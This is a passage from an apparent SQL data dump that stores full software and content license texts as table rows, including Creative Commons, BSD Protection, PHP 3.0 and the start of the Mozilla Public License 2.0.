interpreted as a contract, You are granted the Licensed Rights\nin consideration of Your acceptance of these terms and conditions, and the\nLicensor grants You such rights in consideration of benefits the Licensor\nreceives from making the Licensed Material available under these terms and\nconditions.\n\nSection 1 – Definitions.\n\na. Adapted Material means material subject to Copyright and Similar Rights\nthat is derived from or based upon the Licensed Material and in which the\nLicensed Material is translated, altered, arranged, transformed, or otherwise\nmodified in a manner requiring permission under the Copyright and Similar\nRights held by the Licensor. For purposes of this Public License, where the\nLicensed Material is a musical work, performance, or sound recording, Adapted\nMaterial is always produced where the Licensed Material is synched in timed\nrelation with a moving image.\n\nb. Adapter\'s License means the license You apply to Your Copyright and Similar\nRights in Your contributions to Adapted Material in accordance with the terms\nand conditions of this Public License.\n\nc. BY-NC-SA Compatible License means a license listed at creativecommons.org/compatiblelicenses,\napproved by Creative Commons as essentially the equivalent of this Public\nLicense.\n\nd. Copyright and Similar Rights means copyright and/or similar rights closely\nrelated to copyright including, without limitation, performance, broadcast,\nsound recording, and Sui Generis Database Rights, without regard to how the\nrights are labeled or categorized. For purposes of this Public License, the\nrights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights.\n\ne. Effective Technological Measures means those measures that, in the absence\nof proper authority, may not be circumvented under laws fulfilling obligations\nunder Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996,\nand/or similar international agreements.\n\nf. Exceptions and Limitations means fair use, fair dealing, and/or any other\nexception or limitation to Copyright and Similar Rights that applies to Your\nuse of the Licensed Material.\n\ng. License Elements means the license attributes listed in the name of a Creative\nCommons Public License. The License Elements of this Public License are Attribution,\nNonCommercial, and ShareAlike.\n\nh. Licensed Material means the artistic or literary work, database, or other\nmaterial to which the Licensor applied this Public License.\n\ni. Licensed Rights means the rights granted to You subject to the terms and\nconditions of this Public License, which are limited to all Copyright and\nSimilar Rights that apply to Your use of the Licensed Material and that the\nLicensor has authority to license.\n\nj. Licensor means the individual(s) or entity(ies) granting rights under this\nPublic License.\n\nk. NonCommercial means not primarily intended for or directed towards commercial\nadvantage or monetary compensation. For purposes of this Public License, the\nexchange of the Licensed Material for other material subject to Copyright\nand Similar Rights by digital file-sharing or similar means is NonCommercial\nprovided there is no payment of monetary compensation in connection with the\nexchange.\n\nl. Share means to provide material to the public by any means or process that\nrequires permission under the Licensed Rights, such as reproduction, public\ndisplay, public performance, distribution, dissemination, communication, or\nimportation, and to make material available to the public including in ways\nthat members of the public may access the material from a place and at a time\nindividually chosen by them.\n\nm. Sui Generis Database Rights means rights other than copyright resulting\nfrom Directive 96/9/EC of the European Parliament and of the Council of 11\nMarch 1996 on the legal protection of databases, as amended and/or succeeded,\nas well as other essentially equivalent rights anywhere in the world.\n\nn. You means the individual or entity exercising the Licensed Rights under\nthis Public License. Your has a corresponding meaning.\n\nSection 2 – Scope.\n\n a. License grant.\n\n1. Subject to the terms and conditions of this Public License, the Licensor\nhereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive,\nirrevocable license to exercise the Licensed Rights in the Licensed Material\nto:\n\nA. reproduce and Share the Licensed Material, in whole or in part, for NonCommercial\npurposes only; and\n\nB. produce, reproduce, and Share Adapted Material for NonCommercial purposes\nonly.\n\n2. Exceptions and Limitations. For the avoidance of doubt, where Exceptions\nand Limitations apply to Your use, this Public License does not apply, and\nYou do not need to comply with its terms and conditions.\n\n 3. Term. The term of this Public License is specified in Section 6(a).\n\n4. Media and formats; technical modifications allowed. The Licensor authorizes\nYou to exercise the Licensed Rights in all media and formats whether now known\nor hereafter created, and to make technical modifications necessary to do\nso. The Licensor waives and/or agrees not to assert any right or authority\nto forbid You from making technical modifications necessary to exercise the\nLicensed Rights, including technical modifications necessary to circumvent\nEffective Technological Measures. For purposes of this Public License, simply\nmaking modifications authorized by this Section 2(a)(4) never produces Adapted\nMaterial.\n\n 5. Downstream recipients.\n\nA. Offer from the Licensor – Licensed Material. Every recipient of the Licensed\nMaterial automatically receives an offer from the Licensor to exercise the\nLicensed Rights under the terms and conditions of this Public License.\n\nB. Additional offer from the Licensor – Adapted Material. Every recipient\nof Adapted Material from You automatically receives an offer from the Licensor\nto exercise the Licensed Rights in the Adapted Material under the conditions\nof the Adapter\'s License You apply.\n\nC. No downstream restrictions. You may not offer or impose any additional\nor different terms or conditions on, or apply any Effective Technological\nMeasures to, the Licensed Material if doing so restricts exercise of the Licensed\nRights by any recipient of the Licensed Material.\n\n6. No endorsement. Nothing in this Public License constitutes or may be construed\nas permission to assert or imply that You are, or that Your use of the Licensed\nMaterial is, connected with, or sponsored, endorsed, or granted official status\nby, the Licensor or others designated to receive attribution as provided in\nSection 3(a)(1)(A)(i).\n\n b. Other rights.\n\n1. Moral rights, such as the right of integrity, are not licensed under this\nPublic License, nor are publicity, privacy, and/or other similar personality\nrights; however, to the extent possible, the Licensor waives and/or agrees\nnot to assert any such rights held by the Licensor to the limited extent necessary\nto allow You to exercise the Licensed Rights, but not otherwise.\n\n2. Patent and trademark rights are not licensed under this Public License.\n\n3. To the extent possible, the Licensor waives any right to collect royalties\nfrom You for the exercise of the Licensed Rights, whether directly or through\na collecting society under any voluntary or waivable statutory or compulsory\nlicensing scheme. In all other cases the Licensor expressly reserves any right\nto collect such royalties, including when the Licensed Material is used other\nthan for NonCommercial purposes.\n\nSection 3 – License Conditions.\n\nYour exercise of the Licensed Rights is expressly made subject to the following\nconditions.\n\n a. Attribution.\n\n1. If You Share the Licensed Material (including in modified form), You must:\n\nA. retain the following if it is supplied by the Licensor with the Licensed\nMaterial:\n\ni. identification of the creator(s) of the Licensed Material and any others\ndesignated to receive attribution, in any reasonable manner requested by the\nLicensor (including by pseudonym if designated);\n\n ii. a copyright notice;\n\n iii. a notice that refers to this Public License;\n\n iv. a notice that refers to the disclaimer of warranties;\n\n \n\nv. a URI or hyperlink to the Licensed Material to the extent reasonably practicable;\n\nB. indicate if You modified the Licensed Material and retain an indication\nof any previous modifications; and\n\nC. indicate the Licensed Material is licensed under this Public License, and\ninclude the text of, or the URI or hyperlink to, this Public License.\n\n2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner\nbased on the medium, means, and context in which You Share the Licensed Material.\nFor example, it may be reasonable to satisfy the conditions by providing a\nURI or hyperlink to a resource that includes the required information.\n\n3. If requested by the Licensor, You must remove any of the information required\nby Section 3(a)(1)(A) to the extent reasonably practicable.\n\nb. ShareAlike.In addition to the conditions in Section 3(a), if You Share\nAdapted Material You produce, the following conditions also apply.\n\n1. The Adapter\'s License You apply must be a Creative Commons license with\nthe same License Elements, this version or later, or a BY-NC-SA Compatible\nLicense.\n\n2. You must include the text of, or the URI or hyperlink to, the Adapter\'s\nLicense You apply. You may satisfy this condition in any reasonable manner\nbased on the medium, means, and context in which You Share Adapted Material.\n\n3. You may not offer or impose any additional or different terms or conditions\non, or apply any Effective Technological Measures to, Adapted Material that\nrestrict exercise of the rights granted under the Adapter\'s License You apply.\n\nSection 4 – Sui Generis Database Rights.\n\nWhere the Licensed Rights include Sui Generis Database Rights that apply to\nYour use of the Licensed Material:\n\na. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract,\nreuse, reproduce, and Share all or a substantial portion of the contents of\nthe database for NonCommercial purposes only;\n\nb. if You include all or a substantial portion of the database contents in\na database in which You have Sui Generis Database Rights, then the database\nin which You have Sui Generis Database Rights (but not its individual contents)\nis Adapted Material, including for purposes of Section 3(b); and\n\nc. You must comply with the conditions in Section 3(a) if You Share all or\na substantial portion of the contents of the database.\n\nFor the avoidance of doubt, this Section 4 supplements and does not replace\nYour obligations under this Public License where the Licensed Rights include\nother Copyright and Similar Rights.\n\nSection 5 – Disclaimer of Warranties and Limitation of Liability.\n\na. Unless otherwise separately undertaken by the Licensor, to the extent possible,\nthe Licensor offers the Licensed Material as-is and as-available, and makes\nno representations or warranties of any kind concerning the Licensed Material,\nwhether express, implied, statutory, or other. This includes, without limitation,\nwarranties of title, merchantability, fitness for a particular purpose, non-infringement,\nabsence of latent or other defects, accuracy, or the presence or absence of\nerrors, whether or not known or discoverable. Where disclaimers of warranties\nare not allowed in full or in part, this disclaimer may not apply to You.\n\nb. To the extent possible, in no event will the Licensor be liable to You\non any legal theory (including, without limitation, negligence) or otherwise\nfor any direct, special, indirect, incidental, consequential, punitive, exemplary,\nor other losses, costs, expenses, or damages arising out of this Public License\nor use of the Licensed Material, even if the Licensor has been advised of\nthe possibility of such losses, costs, expenses, or damages. Where a limitation\nof liability is not allowed in full or in part, this limitation may not apply\nto You.\n\nc. The disclaimer of warranties and limitation of liability provided above\nshall be interpreted in a manner that, to the extent possible, most closely\napproximates an absolute disclaimer and waiver of all liability.\n\nSection 6 – Term and Termination.\n\na. This Public License applies for the term of the Copyright and Similar Rights\nlicensed here. However, if You fail to comply with this Public License, then\nYour rights under this Public License terminate automatically.\n\nb. Where Your right to use the Licensed Material has terminated under Section\n6(a), it reinstates:\n\n1. automatically as of the date the violation is cured, provided it is cured\nwithin 30 days of Your discovery of the violation; or\n\n 2. upon express reinstatement by the Licensor.\n\nFor the avoidance of doubt, this Section 6(b) does not affect any right the\nLicensor may have to seek remedies for Your violations of this Public License.\n\nc. For the avoidance of doubt, the Licensor may also offer the Licensed Material\nunder separate terms or conditions or stop distributing the Licensed Material\nat any time; however, doing so will not terminate this Public License.\n\n d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.\n\nSection 7 – Other Terms and Conditions.\n\na. The Licensor shall not be bound by any additional or different terms or\nconditions communicated by You unless expressly agreed.\n\nb. Any arrangements, understandings, or agreements regarding the Licensed\nMaterial not stated herein are separate from and independent of the terms\nand conditions of this Public License.\n\nSection 8 – Interpretation.\n\na. For the avoidance of doubt, this Public License does not, and shall not\nbe interpreted to, reduce, limit, restrict, or impose conditions on any use\nof the Licensed Material that could lawfully be made without permission under\nthis Public License.\n\nb. To the extent possible, if any provision of this Public License is deemed\nunenforceable, it shall be automatically reformed to the minimum extent necessary\nto make it enforceable. If the provision cannot be reformed, it shall be severed\nfrom this Public License without affecting the enforceability of the remaining\nterms and conditions.\n\nc. No term or condition of this Public License will be waived and no failure\nto comply consented to unless expressly agreed to by the Licensor.\n\nd. Nothing in this Public License constitutes or may be interpreted as a limitation\nupon, or waiver of, any privileges and immunities that apply to the Licensor\nor You, including from the legal processes of any jurisdiction or authority.\n\nCreative Commons is not a party to its public licenses. Notwithstanding, Creative\nCommons may elect to apply one of its public licenses to material it publishes\nand in those instances will be considered the \"Licensor.\" The text of the\nCreative Commons public licenses is dedicated to the public domain under the\nCC0 Public Domain Dedication. Except for the limited purpose of indicating\nthat material is shared under a Creative Commons public license or as otherwise\npermitted by the Creative Commons policies published at creativecommons.org/policies,\nCreative Commons does not authorize the use of the trademark \"Creative Commons\"\nor any other trademark or logo of Creative Commons without its prior written\nconsent including, without limitation, in connection with any unauthorized\nmodifications to any of its public licenses or any other arrangements, understandings,\nor agreements concerning use of licensed material. For the avoidance of doubt,\nthis paragraph does not form part of the public licenses.\n\nCreative Commons may be contacted at creativecommons.org.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(49,'BSD-Protection','BSD Protection License\n\nFebruary 2002 Preamble\n\n--------\n\nThe Berkeley Software Distribution (\"BSD\") license has proven very effective\nover the years at allowing for a wide spread of work throughout both commercial\nand non-commercial products. For programmers whose primary intention is to\nimprove the general quality of available software, it is arguable that there\nis no better license than the BSD license, as it permits improvements to be\nused wherever they will help, without idealogical or metallic constraint.\n\nThis is of particular value to those who produce reference implementations\nof proposed standards: The case of TCP/IP clearly illustrates that freely\nand universally available implementations leads the rapid acceptance of standards\n-- often even being used instead of a de jure standard (eg, OSI network models).\n\nWith the rapid proliferation of software licensed under the GNU General Public\nLicense, however, the continued success of this role is called into question.\nGiven that the inclusion of a few lines of \"GPL-tainted\" work into a larger\nbody of work will result in restricted distribution -- and given that further\nwork will likely build upon the \"tainted\" portions, making them difficult\nto remove at a future date -- there are inevitable circumstances where authors\nwould, in order to protect their goal of providing for the widespread usage\nof their work, wish to guard against such \"GPL-taint\".\n\nIn addition, one can imagine that companies which operate by producing and\nselling (possibly closed-source) code would wish to protect themselves against\nthe rise of a GPL-licensed competitor. While under existing licenses this\nwould mean not releasing their code under any form of open license, if a license\nexisted under which they could incorporate any improvements back into their\nown (commercial) products then they might be far more willing to provide for\nnon-closed distribution.\n\nFor the above reasons, we put forth this \"BSD Protection License\": A license\ndesigned to retain the freedom granted by the BSD license to use licensed\nworks in a wide variety of settings, both non-commercial and commercial, while\nprotecting the work from having future contributors restrict that freedom.\n\nThe precise terms and conditions for copying, distribution, and modification\nfollow.\n\nBSD PROTECTION LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION, AND\nMODIFICATION ----------------------------------------------------------------\n\n 0. Definitions.\n\na) \"Program\", below, refers to any program or work distributed under the terms\nof this license.\n\nb) A \"work based on the Program\", below, refers to either the Program or any\nderivative work under copyright law.\n\n c) \"Modification\", below, refers to the act of creating derivative works.\n\n d) \"You\", below, refers to each licensee.\n\n 1. Scope.\n\nThis license governs the copying, distribution, and modification of the Program.\nOther activities are outside the scope of this license; The act of running\nthe Program is not restricted, and the output from the Program is covered\nonly if its contents constitute a work based on the Program.\n\n 2. Verbatim copies.\n\nYou may copy and distribute verbatim copies of the Program as you receive\nit, in any medium, provided that you conspicuously and appropriately publish\non each copy an appropriate copyright notice; keep intact all the notices\nthat refer to this License and to the absence of any warranty; and give any\nother recipients of the Program a copy of this License along with the Program.\n\n 3. Modification and redistribution under closed license.\n\nYou may modify your copy or copies of the Program, and distribute the resulting\nderivative works, provided that you meet the following conditions:\n\na) The copyright notice and disclaimer on the Program must be reproduced and\nincluded in the source code, documentation, and/or other materials provided\nin a manner in which such notices are normally distributed.\n\nb) The derivative work must be clearly identified as such, in order that it\nmay not be confused with the original work.\n\nc) The license under which the derivative work is distributed must expressly\nprohibit the distribution of further derivative works.\n\n 4. Modification and redistribution under open license.\n\nYou may modify your copy or copies of the Program, and distribute the resulting\nderivative works, provided that you meet the following conditions:\n\na) The copyright notice and disclaimer on the Program must be reproduced and\nincluded in the source code, documentation, and/or other materials provided\nin a manner in which such notices are normally distributed.\n\nb) You must clearly indicate the nature and date of any changes made to the\nProgram. The full details need not necessarily be included in the individual\nmodified files, provided that each modified file is clearly marked as such\nand instructions are included on where the full details of the modifications\nmay be found.\n\nc) You must cause any work that you distribute or publish, that in whole or\nin part contains or is derived from the Program or any part thereof, to be\nlicensed as a whole at no charge to all third parties under the terms of this\nLicense.\n\n 5. Implied acceptance.\n\nYou may not copy or distribute the Program or any derivative works except\nas expressly provided under this license. Consequently, any such action will\nbe taken as implied acceptance of the terms of this license.\n\n 6. NO WARRANTY.\n\nTHIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER,\nOR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED\nABOVE, BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\nOR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\nLOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\nON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT,\nEVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF\nSUCH DAMAGES.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(50,'Dotseqn','Copyright (C) 1995 by Donald Arseneau\n\nThis file may be freely transmitted and reproduced, but it may not be changed\nunless the name is changed also (except that you may freely change the paper-size\noption for \\documentclass).\n\nThis notice must be left intact.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(51,'CC-BY-NC-1.0','Creative Commons Attribution-NonCommercial 1.0 CREATIVE COMMONS CORPORATION\nIS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS\nDRAFT LICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS\nPROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING\nFROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS\nCONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Collective Work\" means a work, such as a periodical issue, anthology or\nencyclopedia, in which the Work in its entirety in unmodified form, along\nwith a number of other contributions, constituting separate and independent\nworks in themselves, are assembled into a collective whole. A work that constitutes\na Collective Work will not be considered a Derivative Work (as defined below)\nfor the purposes of this License.\n\nb. \"Derivative Work\" means a work based upon the Work or upon the Work and\nother pre-existing works, such as a translation, musical arrangement, dramatization,\nfictionalization, motion picture version, sound recording, art reproduction,\nabridgment, condensation, or any other form in which the Work may be recast,\ntransformed, or adapted, except that a work that constitutes a Collective\nWork will not be considered a Derivative Work for the purpose of this License.\n\nc. \"Licensor\" means the individual or entity that offers the Work under the\nterms of this License.\n\n d. \"Original Author\" means the individual or entity who created the Work.\n\ne. \"Work\" means the copyrightable work of authorship offered under the terms\nof this License.\n\nf. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\n2. Fair Use Rights. Nothing in this license is intended to reduce, limit,\nor restrict any rights arising from fair use, first sale or other limitations\non the exclusive rights of the copyright owner under copyright law or other\napplicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to reproduce the Work, to incorporate the Work into one or more Collective\nWorks, and to reproduce the Work as incorporated in the Collective Works;\n\n b. to create and reproduce Derivative Works;\n\nc. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission the Work including\nas incorporated in Collective Works;\n\nd. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission Derivative Works;\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nAll rights not expressly granted by Licensor are hereby reserved.\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may distribute, publicly display, publicly perform, or publicly digitally\nperform the Work only under the terms of this License, and You must include\na copy of, or the Uniform Resource Identifier for, this License with every\ncopy or phonorecord of the Work You distribute, publicly display, publicly\nperform, or publicly digitally perform. You may not offer or impose any terms\non the Work that alter or restrict the terms of this License or the recipients\'\nexercise of the rights granted hereunder. You may not sublicense the Work.\nYou must keep intact all notices that refer to this License and to the disclaimer\nof warranties. You may not distribute, publicly display, publicly perform,\nor publicly digitally perform the Work with any technological measures that\ncontrol access or use of the Work in a manner inconsistent with the terms\nof this License Agreement. The above applies to the Work as incorporated in\na Collective Work, but this does not require the Collective Work apart from\nthe Work itself to be made subject to the terms of this License. If You create\na Collective Work, upon notice from any Licensor You must, to the extent practicable,\nremove from the Collective Work any reference to such Licensor or the Original\nAuthor, as requested. If You create a Derivative Work, upon notice from any\nLicensor You must, to the extent practicable, remove from the Derivative Work\nany reference to such Licensor or the Original Author, as requested.\n\nb. You may not exercise any of the rights granted to You in Section 3 above\nin any manner that is primarily intended for or directed toward commercial\nadvantage or private monetary compensation. The exchange of the Work for other\ncopyrighted works by means of digital file-sharing or otherwise shall not\nbe considered to be intended for or directed toward commercial advantage or\nprivate monetary compensation, provided there is no payment of any monetary\ncompensation in connection with the exchange of copyrighted works.\n\nc. If you distribute, publicly display, publicly perform, or publicly digitally\nperform the Work or any Derivative Works or Collective Works, You must keep\nintact all copyright notices for the Work and give the Original Author credit\nreasonable to the medium or means You are utilizing by conveying the name\n(or pseudonym if applicable) of the Original Author if supplied; the title\nof the Work if supplied; in the case of a Derivative Work, a credit identifying\nthe use of the Work in the Derivative Work (e.g., \"French translation of the\nWork by Original Author,\" or \"Screenplay based on original Work by Original\nAuthor\"). Such credit may be implemented in any reasonable manner; provided,\nhowever, that in the case of a Derivative Work or Collective Work, at a minimum\nsuch credit will appear where any other comparable authorship credit appears\nand in a manner at least as prominent as such other comparable authorship\ncredit.\n\n 5. Representations, Warranties and Disclaimer\n\nBy offering the Work for public release under this License, Licensor represents\nand warrants that, to the best of Licensor\'s knowledge after reasonable inquiry:\nLicensor has secured all rights in the Work necessary to grant the license\nrights hereunder and to permit the lawful exercise of the rights granted hereunder\nwithout You having any obligation to pay any royalties, compulsory license\nfees, residuals or any other payments; The Work does not infringe the copyright,\ntrademark, publicity rights, common law rights or any other right of any third\nparty or constitute defamation, invasion of privacy or other tortious injury\nto any third party. EXCEPT AS EXPRESSLY STATED IN THIS LICENSE OR OTHERWISE\nAGREED IN WRITING OR REQUIRED BY APPLICABLE LAW, THE WORK IS LICENSED ON AN\n\"AS IS\" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING,\nWITHOUT LIMITATION, ANY WARRANTIES REGARDING THE CONTENTS OR ACCURACY OF THE\nWORK.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nAND EXCEPT FOR DAMAGES ARISING FROM LIABILITY TO A THIRD PARTY RESULTING FROM\nBREACH OF THE WARRANTIES IN SECTION 5, IN NO EVENT WILL LICENSOR BE LIABLE\nTO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE\nOR EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, EVEN\nIF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Derivative Works or Collective Works from You under this\nLicense, however, will not have their licenses terminated provided such individuals\nor entities remain in full compliance with those licenses. Sections 1, 2,\n5, 6, 7, and 8 will survive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You distribute or publicly digitally perform the Work or a Collective\nWork, the Licensor offers to the recipient a license to the Work on the same\nterms and conditions as the license granted to You under this License.\n\nb. Each time You distribute or publicly digitally perform a Derivative Work,\nLicensor offers to the recipient a license to the original Work on the same\nterms and conditions as the license granted to You under this License.\n\nc. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nd. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\ne. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, neither party will use the trademark \"Creative Commons\"\nor any related trademark or logo of Creative Commons without the prior written\nconsent of Creative Commons. Any permitted use will be in compliance with\nCreative Commons\' then-current trademark usage guidelines, as may be published\non its website or otherwise made available upon request from time to time.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(52,'PHP-3.0','The PHP License, version 3.0\n\nCopyright (c) 1999 - 2006 The PHP Group. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nis permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The name \"PHP\" must not be used to endorse or promote products derived\nfrom this software without prior written permission. For written permission,\nplease contact group@php.net.\n\n4. Products derived from this software may not be called \"PHP\", nor may \"PHP\"\nappear in their name, without prior written permission from group@php.net.\nYou may indicate that your software works in conjunction with PHP by saying\n\"Foo for PHP\" instead of calling it \"PHP Foo\" or \"phpfoo\"\n\n5. The PHP Group may publish revised and/or new versions of the license from\ntime to time. Each version will be given a distinguishing version number.\nOnce covered code has been published under a particular version of the license,\nyou may always continue to use it under the terms of that version. You may\nalso choose to use such covered code under the terms of any subsequent version\nof the license published by the PHP Group. No one other than the PHP Group\nhas the right to modify the terms applicable to covered code created under\nthis License.\n\n6. Redistributions of any form whatsoever must retain the following acknowledgment:\n\"This product includes PHP, freely available from <http://www.php.net/>\".\n\nTHIS SOFTWARE IS PROVIDED BY THE PHP DEVELOPMENT TEAM ``AS IS\'\' AND ANY EXPRESSED\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL THE PHP DEVELOPMENT TEAM OR ITS CONTRIBUTORS BE LIABLE FOR\nANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\nLOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\nON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nThis software consists of voluntary contributions made by many individuals\non behalf of the PHP Group.\n\nThe PHP Group can be contacted via Email at group@php.net.\n\nFor more information on the PHP Group and the PHP project, please see <http://www.php.net>.\n\nThis product includes the Zend Engine, freely available at <http://www.zend.com>.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(53,'Abstyles','This is APREAMBL.TEX, version 1.10e, written by Hans-Hermann Bode\n\n(HHBODE@DOSUNI1.BITNET), for the BibTeX `adaptable\' family, version 1.10.\n\nSee the file APREAMBL.DOC for a detailed documentation.\n\nThis program is distributed WITHOUT ANY WARRANTY, express or implied.\n\nCopyright (C) 1991, 1992 Hans-Hermann Bode\n\nPermission is granted to make and distribute verbatim copies of this document\nprovided that the copyright notice and this permission notice are preserved\non all copies.\n\nPermission is granted to copy and distribute modified versions of this document\nunder the conditions for verbatim copying, provided that the entire resulting\nderived work is distributed under the terms of a permission notice identical\nto this one.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(54,'MPL-2.0','Mozilla Public License Version 2.0\n\n 1. Definitions\n\n1.1. \"Contributor\" means each individual or legal entity that creates, contributes\nto the creation of, or owns Covered Software.\n\n1.2. \"Contributor Version\" means the combination of the Contributions of others\n(if any) used by a Contributor and that particular Contributor\'s Contribution.\n\n 1.3. \"Contribution\" means Covered Software of a particular Contributor.\n\n1.4. \"Covered Software\" means Source Code Form to which the initial Contributor\nhas attached the notice in Exhibit A, the Executable Form of such Source Code\nForm, and Modifications of such Source Code Form, in each case including portions\nthereof.\n\n 1.5. \"Incompatible With Secondary Licenses\" means\n\n(a) that the initial Contributor has attached the notice described in Exhibit\nB to the Covered Software; or\n\n(b) that the Covered Software was made available under the terms of version\n1.1 or earlier of the License, but not also under the terms of a Secondary\nLicense.\n\n1.6. \"Executable Form\" means any form of the work other than Source Code Form.\n\n1.7. \"Larger Work\" means a work that combines Covered Software with other\nmaterial, in a separate file or files, that is not Covered Software.\n\n 1.8. \"License\" means this document.\n\n1.9. \"Licensable\" means having the right to grant, to the maximum extent possible,\nwhether at the time of the initial grant or subsequently, any and all of the\nrights conveyed by this License.\n\n 1.10. \"Modifications\" means any of the following:\n\n(a) any file in Source Code Form that results from an addition to, deletion\nfrom, or modification of the contents of Covered Software; 